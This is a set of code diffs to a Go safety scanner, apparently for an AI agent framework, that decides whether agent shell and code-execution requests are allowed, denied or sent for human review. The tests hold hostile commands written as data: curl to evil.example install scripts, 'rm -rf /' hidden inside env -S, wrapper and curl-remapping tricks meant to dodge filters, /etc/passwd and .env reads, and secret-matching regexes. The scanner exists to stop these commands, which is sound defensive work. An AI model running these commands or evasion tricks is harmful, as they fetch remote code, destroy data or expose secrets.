+	case "printenv", "set":
+		return true
+	default:
+		return false
+	}
+}
+
 func commandChain(argv []string) [][]string {
 	var commands [][]string
 	for len(argv) > 0 {
@@ -1144,13 +1210,33 @@ func unwrapEnvCommand(argv []string) []string {
 	}
 	for i := 1; i < len(argv); {
 		arg := argv[i]
-		if arg == "-u" || arg == "--unset" || arg == "-C" || arg == "--chdir" {
+		if arg == "--" {
+			if i+1 < len(argv) {
+				return argv[i+1:]
+			}
+			return nil
+		}
+		if arg == "-u" || arg == "--unset" || arg == "-C" || arg == "--chdir" ||
+			arg == "-a" || arg == "--argv0" {
 			i += 2
 			continue
 		}
-		if strings.HasPrefix(arg, "-") || strings.Contains(arg, "=") {
+		if strings.HasPrefix(arg, "--unset=") || strings.HasPrefix(arg, "--chdir=") ||
+			strings.HasPrefix(arg, "--argv0=") ||
+			(strings.HasPrefix(arg, "-u") && len(arg) > 2) ||
+			(strings.HasPrefix(arg, "-C") && len(arg) > 2) ||
+			(strings.HasPrefix(arg, "-a") && len(arg) > 2) {
 			i++
 			continue
+		}
+		if arg == "-i" || arg == "--ignore-environment" || arg == "-0" ||
+			arg == "--null" || arg == "-v" || arg == "--debug" ||
+			strings.Contains(arg, "=") {
+			i++
+			continue
+		}
+		if strings.HasPrefix(arg, "-") {
+			return nil
 		}
 		return argv[i:]
 	}
@@ -1548,8 +1634,7 @@ func normalizeShellScript(script string) string {
 	inDouble := false
 	for i := 0; i < len(script); i++ {
 		char := script[i]
-		if end, ok := shellLineContinuationEnd(script, i); ok {
-			normalized.WriteByte(' ')
+		if end, ok := shellLineContinuationEnd(script, i); ok && !inSingle {
 			i = end
 			continue
 		}
@@ -1742,14 +1827,18 @@ var (
 		`(?i)(sk-[A-Za-z0-9_-]{12,}|ghp_[A-Za-z0-9_]{12,}|xox[baprs]-[A-Za-z0-9-]{10,}|-----BEGIN [A-Z ]*PRIVATE KEY-----)`)
 	secretNameValueRE = regexp.MustCompile(
 		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)=([^ \t\n\r;&|]+)`)
+	secretSplitValueRE = regexp.MustCompile(
+		`(?i)(--?(?:api[_-]?key|token|password|passwd|secret|private[_-]?key|credential))([ \t]+)([^ \t\n\r;&|]+)`)
 	codeStringLiteralRE = regexp.MustCompile(
 		`(?s)(?:"((?:\\.|[^"\\])*)"|'((?:\\.|[^'\\])*)')`)
 	codeNetworkCallRE = regexp.MustCompile(
-		`(?i)\b(?:socket\.(?:create_connection|getaddrinfo)|[a-z_][a-z0-9_]*\.connect|http\.client\.(?:http|https)connection)\s*\(\s*\(?\s*["']([^"']+)["']`)
+		`(?i)\b(?:socket\.(?:create_connection|getaddrinfo)|socket\.socket\s*\(\s*\)\s*\.connect|[a-z_][a-z0-9_]*\.connect|http\.client\.(?:http|https)connection)\s*\(\s*\(?\s*["']([^"']+)["']`)
+	windowsCmdExpansionRE = regexp.MustCompile(`%[A-Za-z_][A-Za-z0-9_]*%`)
 )
 
 func looksSensitive(text string) bool {
 	return secretValueRE.MatchString(text) ||
+		secretSplitValueRE.MatchString(text) ||
 		(secretNameRE.MatchString(text) && strings.Contains(text, "="))
 }
 
@@ -1763,6 +1852,7 @@ func (r *redactor) redact(s string) string {
 	orig := s
 	s = secretValueRE.ReplaceAllString(s, "[REDACTED_SECRET]")
 	s = secretNameValueRE.ReplaceAllString(s, "$1=[REDACTED_SECRET]")
+	s = secretSplitValueRE.ReplaceAllString(s, "$1$2[REDACTED_SECRET]")
 	if s != orig {
 		r.changed = true
 	}

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -335,6 +335,55 @@ func TestWrappedNetworkCommandsRejectSchemeLessTarget(t *testing.T) {
 	}
 }
 
+func TestWrappedCommandsApplyPolicyToEffectiveCommand(t *testing.T) {
+	tests := []struct {
+		name     string
+		command  string
+		decision Decision
+		ruleID   string
+		evidence string
+	}{
+		{
+			name:     "env denied command",
+			command:  "env sudo id",
+			decision: DecisionDeny,
+			ruleID:   "policy.denied_command",
+			evidence: `command "sudo" is denied`,
+		},
+		{
+			name:     "command destructive command",
+			command:  "command rm -rf work/tmp",
+			decision: DecisionDeny,
+			ruleID:   "dangerous.rm_rf",
+			evidence: "rm -rf work/tmp",
+		},
+		{
+			name:     "timeout review command",
+			command:  "timeout 5 npm install left-pad",
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "dependency.environment_change",
+			evidence: `command starts with "npm install"`,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  tt.command,
+			}, DefaultPolicy())
+			if report.Decision != tt.decision || report.RuleID != tt.ruleID {
+				t.Fatalf("unexpected wrapped command report: %+v", report)
+			}
+			if !slices.Contains(report.Evidence, tt.evidence) {
+				t.Fatalf("evidence = %q, want effective command evidence %q",
+					report.Evidence, tt.evidence)
+			}
+		})
+	}
+}
+
 func TestNetworkCommandsRejectLoopbackTargets(t *testing.T) {
 	commands := []string{
 		"/usr/bin/curl 127.0.0.1",

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -133,11 +133,12 @@ func TestScanRequiredSamples(t *testing.T) {
 		{
 			name: "hostexec long session",
 			req: Request{
-				ToolName:   "exec_command",
-				Backend:    BackendHostExec,
-				Command:    "tail -f app.log",
-				TTY:        true,
-				Background: true,
+				ToolName:       "exec_command",
+				Backend:        BackendHostExec,
+				Command:        "tail -f app.log",
+				TimeoutSeconds: DefaultPolicy().MaxTimeoutSeconds,
+				TTY:            true,
+				Background:     true,
 			},
 			decision: DecisionNeedsHumanReview,
 			ruleID:   "hostexec.long_session",
@@ -257,6 +258,57 @@ func TestLoadPolicyCanDisableParseErrorDeny(t *testing.T) {
 	}, policy)
 	if report.Decision != DecisionAsk || report.RuleID != "shellsafe.parse_error" {
 		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestLoadPolicyRejectsUnknownFields(t *testing.T) {
+	tests := []struct {
+		name     string
+		filename string
+		content  string
+	}{
+		{
+			name:     "JSON allowlist typo",
+			filename: "policy.json",
+			content:  `{"allowed_command":["go"]}`,
+		},
+		{
+			name:     "JSON denylist typo",
+			filename: "policy.json",
+			content:  `{"denied_command":["sudo"]}`,
+		},
+		{
+			name:     "JSON resource typo",
+			filename: "policy.json",
+			content:  `{"max_timeout_second":30}`,
+		},
+		{
+			name:     "YAML allowlist typo",
+			filename: "policy.yaml",
+			content:  "allowed_command:\n  - go\n",
+		},
+		{
+			name:     "YAML denylist typo",
+			filename: "policy.yaml",
+			content:  "denied_command:\n  - sudo\n",
+		},
+		{
+			name:     "YAML resource typo",
+			filename: "policy.yaml",
+			content:  "max_output_byte: 1024\n",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			path := filepath.Join(t.TempDir(), tt.filename)
+			if err := os.WriteFile(path, []byte(tt.content), 0o600); err != nil {
+				t.Fatal(err)
+			}
+			if _, err := LoadPolicy(path); err == nil {
+				t.Fatal("LoadPolicy unknown field error = nil")
+			}
+		})
 	}
 }
 
@@ -384,6 +436,69 @@ func TestWrappedCommandsApplyPolicyToEffectiveCommand(t *testing.T) {
 	}
 }
 
+func TestWrappedCommandsApplyAllowlistToEveryCommand(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.AllowedCommands = []string{"env", "timeout"}
+	for _, command := range []string{
+		"env python payload.py",
+		"env timeout 5 python payload.py",
+	} {
+		t.Run(command, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  command,
+			}, policy)
+			if report.Decision != DecisionDeny ||
+				report.RuleID != "policy.command_not_allowed" ||
+				!strings.Contains(strings.Join(report.Evidence, " "), "python") {
+				t.Fatalf("effective command should be rejected by allowlist: %+v", report)
+			}
+		})
+	}
+}
+
+func TestUnresolvedCommandWrappersFailClosed(t *testing.T) {
+	tests := []struct {
+		name        string
+		destructive string
+		network     string
+	}{
+		{name: "xargs", destructive: "xargs sudo id", network: "xargs curl evil.example"},
+		{name: "setsid", destructive: "setsid sudo id", network: "setsid curl evil.example"},
+		{name: "unshare", destructive: "unshare sudo id", network: "unshare curl evil.example"},
+		{name: "chroot", destructive: "chroot work sudo id", network: "chroot work curl evil.example"},
+		{name: "runuser", destructive: "runuser -u nobody -- sudo id", network: "runuser -u nobody -- curl evil.example"},
+		{name: "time", destructive: "time sudo id", network: "time curl evil.example"},
+		{name: "ionice", destructive: "ionice sudo id", network: "ionice curl evil.example"},
+		{name: "taskset", destructive: "taskset 1 sudo id", network: "taskset 1 curl evil.example"},
+		{name: "stdbuf", destructive: "stdbuf -o0 sudo id", network: "stdbuf -o0 curl evil.example"},
+		{name: "strace", destructive: "strace sudo id", network: "strace curl evil.example"},
+		{name: "ltrace", destructive: "ltrace sudo id", network: "ltrace curl evil.example"},
+		{name: "script", destructive: `script -c "sudo id" audit.log`, network: `script -c "curl evil.example" audit.log`},
+		{name: "flock", destructive: "flock lockfile sudo id", network: "flock lockfile curl evil.example"},
+	}
+
+	for _, tt := range tests {
+		for scenario, command := range map[string]string{
+			"destructive": tt.destructive,
+			"network":     tt.network,
+		} {
+			t.Run(tt.name+"/"+scenario, func(t *testing.T) {
+				report := Scan(Request{
+					ToolName: "workspace_exec",
+					Backend:  BackendWorkspaceExec,
+					Command:  command,
+				}, DefaultPolicy())
+				if report.Decision != DecisionDeny ||
+					!reportHasRule(report, "shell.unresolved_wrapper") {
+					t.Fatalf("unresolved wrapper should fail closed: %+v", report)
+				}
+			})
+		}
+	}
+}
+
 func TestNetworkCommandsRejectLoopbackTargets(t *testing.T) {
 	commands := []string{
 		"/usr/bin/curl 127.0.0.1",
@@ -401,6 +516,74 @@ func TestNetworkCommandsRejectLoopbackTargets(t *testing.T) {
 				t.Fatalf("loopback network target should be denied: %+v", report)
 			}
 		})
+	}
+}
+
+func TestCurlRemappingOptionsValidateReplacementTarget(t *testing.T) {
+	tests := []struct {
+		name     string
+		command  string
+		decision Decision
+		ruleID   string
+	}{
+		{
+			name: "connect-to denied host",
+			command: "curl --connect-to api.github.com:443:evil.example:443 " +
+				"https://api.github.com/repos",
+			decision: DecisionDeny,
+			ruleID:   "network.non_whitelisted_domain",
+		},
+		{
+			name: "connect-to allowed host assignment",
+			command: "curl --connect-to=api.github.com:443:github.com:443 " +
+				"https://api.github.com/repos",
+			decision: DecisionAllow,
+		},
+		{
+			name: "resolve denied address",
+			command: "curl --resolve api.github.com:443:203.0.113.10 " +
+				"https://api.github.com/repos",
+			decision: DecisionDeny,
+			ruleID:   "network.non_whitelisted_domain",
+		},
+		{
+			name: "malformed remap requires review",
+			command: "curl --connect-to broken " +
+				"https://api.github.com/repos",
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "network.unresolved_curl_remap",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  tt.command,
+			}, DefaultPolicy())
+			if report.Decision != tt.decision || report.RuleID != tt.ruleID {
+				t.Fatalf("unexpected curl remapping report: %+v", report)
+			}
+		})
+	}
+}
+
+func TestParseCurlRemapValueHandlesBracketedAddresses(t *testing.T) {
+	targets, ok := parseCurlRemapValue(
+		"--connect-to",
+		"api.github.com:443:[2001:db8::1]:443",
+	)
+	if !ok || !slices.Equal(targets, []string{"[2001:db8::1]"}) {
+		t.Fatalf("connect-to targets = %q, ok = %v", targets, ok)
+	}
+
+	targets, ok = parseCurlRemapValue(
+		"--resolve",
+		"api.github.com:443:[2001:db8::1],203.0.113.10",
+	)
+	if !ok || !slices.Equal(targets, []string{"[2001:db8::1]", "203.0.113.10"}) {
+		t.Fatalf("resolve targets = %q, ok = %v", targets, ok)
 	}
 }
 
@@ -654,6 +837,130 @@ func TestPermissionPolicyMapsReviewToAsk(t *testing.T) {
 	}
 }
 
+func TestPermissionPolicyResolvesHostExecDefaultTimeout(t *testing.T) {
+	tests := []struct {
+		name string
+		args string
+	}{
+		{name: "omitted", args: `{"command":"go test ./..."}`},
+		{name: "zero", args: `{"command":"go test ./...","timeout_sec":0}`},
+		{name: "negative", args: `{"command":"go test ./...","timeout_sec":-1}`},
+	}
+
+	policy := NewPermissionPolicy(DefaultPolicy())
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			decision, err := policy.CheckToolPermission(
+				context.Background(),
+				&tool.PermissionRequest{
+					ToolName:  "exec_command",
+					Arguments: []byte(tt.args),
+				},
+			)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if decision.Action != tool.PermissionActionDeny ||
+				!strings.Contains(decision.Reason, "resource.timeout_exceeded") ||
+				!strings.Contains(decision.Reason, "1800s") {
+				t.Fatalf("hostexec default timeout should be denied: %+v", decision)
+			}
+		})
+	}
+
+	decision, err := policy.CheckToolPermission(
+		context.Background(),
+		&tool.PermissionRequest{
+			ToolName:  "exec_command",
+			Arguments: []byte(`{"command":"go test ./...","timeout_sec":300}`),
+		},
+	)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("bounded hostexec timeout should be allowed: %+v", decision)
+	}
+}
+
+func TestPermissionPolicyChecksNonShellCodePathsAndNetwork(t *testing.T) {
+	tests := []struct {
+		name string
+		code string
+		rule string
+	}{
+		{
+			name: "denied Python path",
+			code: `print(open('/etc/passwd').read())`,
+			rule: "sensitive.path_access",
+		},
+		{
+			name: "non-allowlisted Python socket",
+			code: `socket.create_connection(('evil.example', 443))`,
+			rule: "network.non_whitelisted_domain",
+		},
+	}
+
+	policy := NewPermissionPolicy(DefaultPolicy())
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			args, err := json.Marshal(map[string]any{
+				"code_blocks": []map[string]string{{
+					"language": "python",
+					"code":     tt.code,
+				}},
+			})
+			if err != nil {
+				t.Fatal(err)
+			}
+			decision, err := policy.CheckToolPermission(
+				context.Background(),
+				&tool.PermissionRequest{
+					ToolName:  "execute_code",
+					Arguments: args,
+				},
+			)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if decision.Action != tool.PermissionActionDeny ||
+				!strings.Contains(decision.Reason, tt.rule) {
+				t.Fatalf("non-shell code policy was not enforced: %+v", decision)
+			}
+		})
+	}
+}
+
+func TestPermissionPolicyValidatesDeclaredCustomOutputCap(t *testing.T) {
+	policyConfig := DefaultPolicy()
+	policyConfig.MaxOutputBytes = 1024
+	policy := NewPermissionPolicy(
+		policyConfig,
+		WithPermissionRequestParser(
+			"custom_exec",
+			func(req *tool.PermissionRequest) (Request, bool, error) {
+				return Request{
+					ToolName:       req.ToolName,
+					Backend:        "custom",
+					Command:        "go test ./...",
+					MaxOutputBytes: 2048,
+				}, true, nil
+			},
+		),
+	)
+	decision, err := policy.CheckToolPermission(
+		context.Background(),
+		&tool.PermissionRequest{ToolName: "custom_exec"},
+	)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny ||
+		!strings.Contains(decision.Reason, "resource.output_limit_exceeded") {
+		t.Fatalf("declared custom output cap should be validated: %+v", decision)
+	}
+}
+
 func TestPermissionPolicyUsesExtensionRequestParser(t *testing.T) {
 	parserCalled := false
 	policy := NewPermissionPolicy(
@@ -893,6 +1200,38 @@ func TestRequestFromPermissionRequestParsesExecMetadata(t *testing.T) {
 	}
 }
 
+func TestBuiltInPermissionRequestsDoNotClaimOutputByteCap(t *testing.T) {
+	tests := []struct {
+		name string
+		args string
+	}{
+		{name: "workspace_exec", args: `{"command":"go test ./..."}`},
+		{name: "exec_command", args: `{"command":"go test ./..."}`},
+		{
+			name: "execute_code",
+			args: `{"code_blocks":[{"language":"python","code":"print(1)"}]}`,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+				ToolName:  tt.name,
+				Arguments: []byte(tt.args),
+			})
+			if err != nil {
+				t.Fatal(err)
+			}
+			if !ok {
+				t.Fatal("RequestFromPermissionRequest() ok = false")
+			}
+			if req.MaxOutputBytes != 0 {
+				t.Fatalf("built-in request output cap = %d, want undeclared", req.MaxOutputBytes)
+			}
+		})
+	}
+}
+
 func TestRequestFromPermissionRequestParsesTTYAndTimeoutSec(t *testing.T) {
 	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
 		ToolName: "workspace_exec",
@@ -1100,6 +1439,16 @@ func TestScanAdditionalRuleBranches(t *testing.T) {
 			ruleID: "dangerous.recursive_chmod",
 		},
 		{
+			name:   "recursive chmod clustered option",
+			cmd:    "chmod -Rv 777 .",
+			ruleID: "dangerous.recursive_chmod",
+		},
+		{
+			name:   "recursive chmod long option",
+			cmd:    "chmod --recursive 777 .",
+			ruleID: "dangerous.recursive_chmod",
+		},
+		{
 			name:   "network command without target",
 			cmd:    "curl --head",
 			ruleID: "network.unresolved_target",
@@ -1247,11 +1596,27 @@ func TestScanHighConcurrencyNeedsReview(t *testing.T) {
 	report := Scan(Request{
 		ToolName: "workspace_exec",
 		Backend:  BackendWorkspaceExec,
-		Command:  "printf jobs | xargs -P 64 -n 1 echo",
+		Command:  "parallel -j 64 echo ::: a b c",
 	}, DefaultPolicy())
 	if report.Decision != DecisionNeedsHumanReview ||
 		report.RuleID != "resource.high_concurrency" {
 		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestCommandNameStripsExecutableSuffixCaseInsensitively(t *testing.T) {
+	tests := map[string]string{
+		"DD.EXE":          "dd",
+		"Curl.ExE":        "curl",
+		"SCRIPT.CMD":      "script",
+		"Tool.BaT":        "tool",
+		"utility.CoM":     "utility",
+		`C:\\Bin\\DD.EXE`: "dd",
+	}
+	for input, want := range tests {
+		if got := commandName(input); got != want {
+			t.Fatalf("commandName(%q) = %q, want %q", input, got, want)
+		}
 	}
 }
 

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -355,6 +355,71 @@ func TestNetworkCommandsRejectLoopbackTargets(t *testing.T) {
 	}
 }
 
+func TestGitNetworkOperationsValidateRemoteHost(t *testing.T) {
+	tests := []struct {
+		name     string
+		command  string
+		decision Decision
+		ruleID   string
+	}{
+		{
+			name:     "deny SCP-like SSH remote",
+			command:  "git clone git@evil.example:org/repo",
+			decision: DecisionDeny,
+			ruleID:   "network.non_whitelisted_domain",
+		},
+		{
+			name:     "allow whitelisted SCP-like SSH remote",
+			command:  "git clone git@github.com:trpc-group/trpc-agent-go.git",
+			decision: DecisionAllow,
+		},
+		{
+			name:     "review unresolved remote alias",
+			command:  "git fetch origin",
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "network.unresolved_target",
+		},
+		{
+			name:     "allow local operation",
+			command:  "git status",
+			decision: DecisionAllow,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  tt.command,
+			}, DefaultPolicy())
+			if report.Decision != tt.decision || report.RuleID != tt.ruleID {
+				t.Fatalf("unexpected Git network report: %+v", report)
+			}
+		})
+	}
+}
+
+func TestEnvSplitStringFailsClosed(t *testing.T) {
+	commands := []string{
+		"env -S 'rm -rf /'",
+		"env --split-string 'curl evil.example'",
+	}
+	for _, command := range commands {
+		t.Run(command, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  command,
+			}, DefaultPolicy())
+			if report.Decision != DecisionDeny ||
+				report.RuleID != "shell.env_split_string" {
+				t.Fatalf("env split-string payload should fail closed: %+v", report)
+			}
+		})
+	}
+}
+
 func TestDeniedPathsIncludeOptionValuesAndDotenvVariants(t *testing.T) {
 	commands := []string{
 		"node --env-file=.env app.js",
@@ -1266,6 +1331,16 @@ func TestUnwrapCommandVariants(t *testing.T) {
 			want: nil,
 		},
 		{
+			name: "env split string short",
+			argv: []string{"env", "-S", "curl evil.example"},
+			want: nil,
+		},
+		{
+			name: "env split string long assignment",
+			argv: []string{"env", "--split-string=curl evil.example"},
+			want: nil,
+		},
+		{
 			name: "command flags",
 			argv: []string{"command", "-p", "--", "curl", "evil.example"},
 			want: []string{"curl", "evil.example"},
@@ -1331,6 +1406,16 @@ func TestContainsNetworkCommandVariants(t *testing.T) {
 			name: "direct",
 			argv: []string{"curl", "evil.example"},
 			want: true,
+		},
+		{
+			name: "Git SSH remote",
+			argv: []string{"git", "clone", "git@evil.example:org/repo"},
+			want: true,
+		},
+		{
+			name: "Git local operation",
+			argv: []string{"git", "status"},
+			want: false,
 		},
 		{
 			name: "env options and assignment",

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -15,7 +15,10 @@ import (
 	"errors"
 	"os"
 	"path/filepath"
+	"runtime"
+	"slices"
 	"strings"
+	"sync"
 	"testing"
 
 	"trpc.group/trpc-go/trpc-agent-go/tool"
@@ -257,6 +260,187 @@ func TestLoadPolicyCanDisableParseErrorDeny(t *testing.T) {
 	}
 }
 
+func TestAllowedCommandsRequireExactExecutable(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.AllowedCommands = []string{"go"}
+
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "./go version",
+	}, policy)
+	if report.Decision != DecisionDeny ||
+		report.RuleID != "policy.command_not_allowed" {
+		t.Fatalf("workspace-relative executable should not match bare allow entry: %+v", report)
+	}
+}
+
+func TestAllowedCommandsAreCaseSensitiveOutsideWindows(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("Windows executable lookup is case-insensitive")
+	}
+	policy := DefaultPolicy()
+	policy.AllowedCommands = []string{"go"}
+
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "GO version",
+	}, policy)
+	if report.Decision != DecisionDeny ||
+		report.RuleID != "policy.command_not_allowed" {
+		t.Fatalf("allow entry should preserve executable case: %+v", report)
+	}
+}
+
+func TestNetworkCommandsAtPathsRejectSchemeLessTarget(t *testing.T) {
+	commands := []string{
+		"/usr/bin/curl evil.example/install.sh",
+		"./curl evil.example/install.sh",
+	}
+	for _, command := range commands {
+		t.Run(command, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  command,
+			}, DefaultPolicy())
+			if report.Decision != DecisionDeny ||
+				report.RuleID != "network.non_whitelisted_domain" {
+				t.Fatalf("scheme-less non-allowlisted target should be denied: %+v", report)
+			}
+		})
+	}
+}
+
+func TestWrappedNetworkCommandsRejectSchemeLessTarget(t *testing.T) {
+	commands := []string{
+		"env curl evil.example/install.sh",
+		"command curl evil.example/install.sh",
+		"timeout 5 curl evil.example/install.sh",
+		"nice curl evil.example/install.sh",
+	}
+	for _, command := range commands {
+		t.Run(command, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  command,
+			}, DefaultPolicy())
+			if report.Decision != DecisionDeny ||
+				report.RuleID != "network.non_whitelisted_domain" {
+				t.Fatalf("wrapped network command should be denied: %+v", report)
+			}
+		})
+	}
+}
+
+func TestNetworkCommandsRejectLoopbackTargets(t *testing.T) {
+	commands := []string{
+		"/usr/bin/curl 127.0.0.1",
+		"/usr/bin/curl localhost",
+	}
+	for _, command := range commands {
+		t.Run(command, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  command,
+			}, DefaultPolicy())
+			if report.Decision != DecisionDeny ||
+				report.RuleID != "network.non_whitelisted_domain" {
+				t.Fatalf("loopback network target should be denied: %+v", report)
+			}
+		})
+	}
+}
+
+func TestDeniedPathsIncludeOptionValuesAndDotenvVariants(t *testing.T) {
+	commands := []string{
+		"node --env-file=.env app.js",
+		"app --config=/etc/secrets",
+		"cat production.env",
+		"cat .env.production",
+	}
+	for _, command := range commands {
+		t.Run(command, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  command,
+			}, DefaultPolicy())
+			if report.Decision != DecisionDeny ||
+				!reportHasRule(report, "sensitive.path_access") {
+				t.Fatalf("sensitive path should be denied: %+v", report)
+			}
+		})
+	}
+}
+
+func TestMultilineBashCodeDoesNotReportParseError(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "execute_code",
+		Backend:  BackendCodeExec,
+		CodeBlocks: []CodeBlock{{
+			Language: "bash",
+			Code:     "go test ./...\ngo vet ./...",
+		}},
+	}, DefaultPolicy())
+	if reportHasRule(report, "shellsafe.parse_error") {
+		t.Fatalf("valid multiline bash should not produce a parse error: %+v", report)
+	}
+}
+
+func TestMultilineBashAfterEscapedQuoteRejectsNetworkTarget(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "execute_code",
+		Backend:  BackendCodeExec,
+		CodeBlocks: []CodeBlock{{
+			Language: "bash",
+			Code:     "echo \"say \\\"hello\"\ncurl evil.example/install.sh",
+		}},
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny ||
+		report.RuleID != "network.non_whitelisted_domain" {
+		t.Fatalf("network command after escaped quote should be denied: %+v", report)
+	}
+}
+
+func TestShellBypassRedirectsRespectQuotes(t *testing.T) {
+	for _, command := range []string{
+		`echo "1 > 0"`,
+		`echo '1 < 2'`,
+	} {
+		t.Run("quoted "+command, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  command,
+			}, DefaultPolicy())
+			if reportHasRule(report, "shell.bypass") {
+				t.Fatalf("quoted redirect character should be literal: %+v", report)
+			}
+		})
+	}
+
+	for _, command := range []string{
+		"echo ok > output.txt",
+		"cat < input.txt",
+	} {
+		t.Run("unquoted "+command, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  command,
+			}, DefaultPolicy())
+			if report.Decision != DecisionDeny ||
+				!reportHasRule(report, "shell.bypass") {
+				t.Fatalf("unquoted redirect should be denied as a shell bypass: %+v", report)
+			}
+		})
+	}
+}
+
 func TestPolicyZeroValueKeepsConservativeDefaults(t *testing.T) {
 	report := Scan(Request{
 		ToolName: "workspace_exec",
@@ -449,12 +633,72 @@ func TestPermissionPolicyAuditPath(t *testing.T) {
 
 func TestPermissionPolicyAuditWriterError(t *testing.T) {
 	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditWriter(errorWriter{}))
-	_, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
 		ToolName:  "workspace_exec",
 		Arguments: []byte(`{"command":"go test ./..."}`),
 	})
 	if err == nil {
 		t.Fatal("CheckToolPermission audit writer error = nil")
+	}
+	if decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("audit writer error action = %q, want deny", decision.Action)
+	}
+}
+
+func TestPermissionPolicyConcurrentAuditWritesCompleteJSONL(t *testing.T) {
+	const requestCount = 64
+
+	var audit bytes.Buffer
+	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditWriter(&audit))
+	start := make(chan struct{})
+	results := make(chan struct {
+		decision tool.PermissionDecision
+		err      error
+	}, requestCount)
+	var wg sync.WaitGroup
+	for i := 0; i < requestCount; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			<-start
+			decision, err := policy.CheckToolPermission(
+				context.Background(),
+				&tool.PermissionRequest{
+					ToolName:  "workspace_exec",
+					Arguments: []byte(`{"command":"go test ./..."}`),
+				},
+			)
+			results <- struct {
+				decision tool.PermissionDecision
+				err      error
+			}{decision: decision, err: err}
+		}()
+	}
+	close(start)
+	wg.Wait()
+	close(results)
+
+	for result := range results {
+		if result.err != nil {
+			t.Fatalf("CheckToolPermission() error = %v", result.err)
+		}
+		if result.decision.Action != tool.PermissionActionAllow {
+			t.Fatalf("action = %q, want allow", result.decision.Action)
+		}
+	}
+
+	lines := bytes.Split(bytes.TrimSpace(audit.Bytes()), []byte{'\n'})
+	if len(lines) != requestCount {
+		t.Fatalf("audit lines = %d, want %d", len(lines), requestCount)
+	}
+	for i, line := range lines {
+		var event AuditEvent
+		if err := json.Unmarshal(line, &event); err != nil {
+			t.Fatalf("audit line %d was not complete JSON: %v\n%s", i, err, line)
+		}
+		if event.ToolName != "workspace_exec" || event.Decision != DecisionAllow {
+			t.Fatalf("unexpected audit event on line %d: %+v", i, event)
+		}
 	}
 }
 
@@ -995,6 +1239,280 @@ func TestWriteAuditJSONLWritesOneRecord(t *testing.T) {
 	}
 }
 
+func TestUnwrapCommandVariants(t *testing.T) {
+	tests := []struct {
+		name string
+		argv []string
+		want []string
+	}{
+		{
+			name: "env unset",
+			argv: []string{"env", "-u", "TOKEN", "curl", "evil.example"},
+			want: []string{"curl", "evil.example"},
+		},
+		{
+			name: "env chdir",
+			argv: []string{"env", "-C", "/tmp", "curl", "evil.example"},
+			want: []string{"curl", "evil.example"},
+		},
+		{
+			name: "env assignment",
+			argv: []string{"env", "MODE=test", "curl", "evil.example"},
+			want: []string{"curl", "evil.example"},
+		},
+		{
+			name: "env without command",
+			argv: []string{"env", "-u", "TOKEN"},
+			want: nil,
+		},
+		{
+			name: "command flags",
+			argv: []string{"command", "-p", "--", "curl", "evil.example"},
+			want: []string{"curl", "evil.example"},
+		},
+		{
+			name: "command without command",
+			argv: []string{"command", "-p"},
+			want: nil,
